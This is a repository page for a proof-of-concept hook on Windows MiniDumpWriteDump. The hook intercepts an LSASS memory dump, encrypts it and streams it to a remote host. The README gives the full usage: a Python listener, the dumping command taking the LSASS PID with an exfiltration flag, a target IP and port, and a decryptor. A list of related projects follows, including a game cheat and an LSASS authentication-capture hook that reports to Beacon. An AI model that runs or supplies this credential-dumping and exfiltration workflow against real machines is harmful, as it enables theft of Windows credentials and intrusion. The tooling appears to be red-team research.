MiniDumpWriteDump behavior modification hook

MiniDumpWriteDumpPoC

MiniDumpWriteDump behavior modification hook

Read the full article in our blog: Adepts Of 0xCC: Hooks On Hoot Off

This is a function hook that allows to access the buffer generated by MiniDumpWriteDump before it gets to disk.

Once accessed, it will encrypt the buffer and send it through a socket to a given host.

Compilation

A full VS solution is provided. Just compile it.

Usage

First, set up the server to listen on the receiving host:

python3 serv.py <PORT>

    python3 serv.py 1234
.\minidumppoc.exe <LSASS_PID> <WRITE_TO_FILE 0|1> <EXFIL 0|1> [<HOST> <PORT>] [<EXPORT_PATH>]

    minidump.exe 696 1 1 '192.168.1.10' 1234 "c:\test.dmp"

Once the whole file is received, close the server, and use the dummy decryptor:

python3 dec.py woot.dmp woot_decrypted.dmp 0xb0
Similar Resources

🎮 Plants vs. Zombies multiplayer battle, developed via reverse engineering, inline hook and dynamic-link library injection. Two online players defend and attack as the plant side and zombie side respectively.

🎮 Plants vs. Zombies multiplayer battle, developed via reverse engineering, inline hook and dynamic-link library injection. Two online players defend and attack as the plant side and zombie side respectively.

Plants vs. Zombies Online Battle This project has two original repositories: https://github.com/czs108/Plants-vs.-Zombies-Online-Battle https://github

Oct 14, 2021

codeless Android hook (experimental)

AppInspect Download app-inspect-v0.0.1.zip AppInspect-0.0.1.apk Install: install Riru module adb push app-inspect-v0.0.1.zip /data/local/tmp adb shel

Dec 4, 2022

A demo of the relevant blog post: Hook Heaps and Live Free

A demo of the relevant blog post: Hook Heaps and Live Free

LockdExeDemo A demo of the relevant blog post: Hook Heaps and Live Free DEMO Explanation There are 2 compile types. The first is an EXE. The EXE requi

Nov 28, 2022

Hook up the OnePlus6(T) tri-state key in PostmarketOS!

OnePlus 6(T) tri-state key support in PostmarketOS As the name suggest, the goal of this little project is to hook up the OnePlus6(T) tri-state key in

Nov 14, 2021

An efficient and versatile system call hook mechanism

An efficient and versatile system call hook mechanism

Zpoline: hooking system calls without pain Zpoline is a novel system call hook mechanism that offers the following advantages. 100 times faster than p

Dec 28, 2022

Simple native jvm class dumper written in C by hook ClassLoader

Simple native jvm class dumper written in C by hook ClassLoader

JVM Native Class Dumper Simple native jvm class dumper written in C by hook ClassLoader What is used for? This tool allows you to dump all java classe

Nov 7, 2022

BokutachiHook - Hook for Lunatic Rave 2 to parse score data and send it to an HTTP server, made specifically for Bokutachi IR.

BokutachiHook Hook for Lunatic Rave 2 to parse score data and send it to an HTTP server, made specifically for Bokutachi IR (https://bokutachi.xyz). T

Dec 24, 2022

Malloc geiger is a hook for malloc that plays geiger counter blips in proportion to the amount of calls to malloc as a way of knowing what an application does

Malloc Geiger Malloc geiger is a hook for malloc that plays geiger counter blips in proportion to the amount of calls to malloc as a way of knowing wh

Dec 19, 2022

Single-header VMT hook class using vfptr swap method

Single-header C++ VMT hooking (vfptr swap) Supports RAII Unit tested with Catch2 Tested on x86/x64, MSVC and Clang/LLVM VMT size calculation Windows-o

Dec 11, 2022
android analysis tools, jni trace by native hook, libc hook, write log with caller's addr in file or AndroidLog

编译方法 unix like mkdir "build" cd build cmake .. -DNDK=your_ndk_path/Android/sdk/ndk/22.0.7026061 -DANDROID_ABI=armeabi-v7a make -j8 或者使用andriod studio编

Dec 1, 2022
collection of C/C++ programs that try to get compilers to exploit undefined behavior

------------------------------------------------------------------------------- UB Canaries: A collection of C/C++ programs that detect undefined beh

Nov 22, 2022
GlueGD is a mod loader for Geometry Dash that does not require a modification to any existing Geometry Dash files or an external injector or launcher.

GlueGD is a mod loader for Geometry Dash that does not require a modification to any existing Geometry Dash files or an external injector or la

Apr 10, 2022
Tomb Raider III multiplayer modification.

Tomb Raider III Multiplayer Mod. Multiplayer Modification for Tomb Raider III. Website: https://tr3mp.net/ If you own the base source of \patch projec

Dec 25, 2021
Project is to port original Zmodem for Unix to CP/M and provide binaries and source code for platform specific modification as needed. Based on 1986 C source code by Chuck Forsberg

Zmodem-CP-M This repository is intended to foster a RetroBrewComputers community effort to port the original Zmodem source code for Unix to CP/M so ev

Aug 31, 2022
Project is to port original Zmodem for Unix to CP/M and provide binaries and source code for platform specific modification as needed. Based on 1986 C source code by Chuck Forsberg

Zmodem4CPM This repository is intended to foster a RetroBrewComputers community effort to port the original Zmodem source code for Unix to CP/M so eve

Aug 31, 2022
An easy to decode base64 modification.

crzy64 An easy to decode base64 modification. This is a base64 modification designed to simplify the decoding step. For the four encoded bytes, it onl

Dec 30, 2022
External warzone cheat with manual mapped driver (function hook), overlay (nvidia hijack), simple esp, no recoil

external_warzone_cheat External warzone cheat with manual mapped driver (function hook), overlay (nvidia hijack), simple esp, no recoil Offsests are N

Jan 2, 2023
Easily hook WIN32 x64 functions

About Library for easy hooking of arbitrary functions in WIN32 x64 executables. Only requires target function address. Disassembles the function prolo

Jun 12, 2022
A crappy hook on SpAcceptLsaModeContext that prints incoming auth attempts. WIP

About Hooks for intercepting SpAcceptLsaModeContext to print any incoming authentication attempts to Beacon. The hook is installed on the Lsass heap t

Dec 11, 2021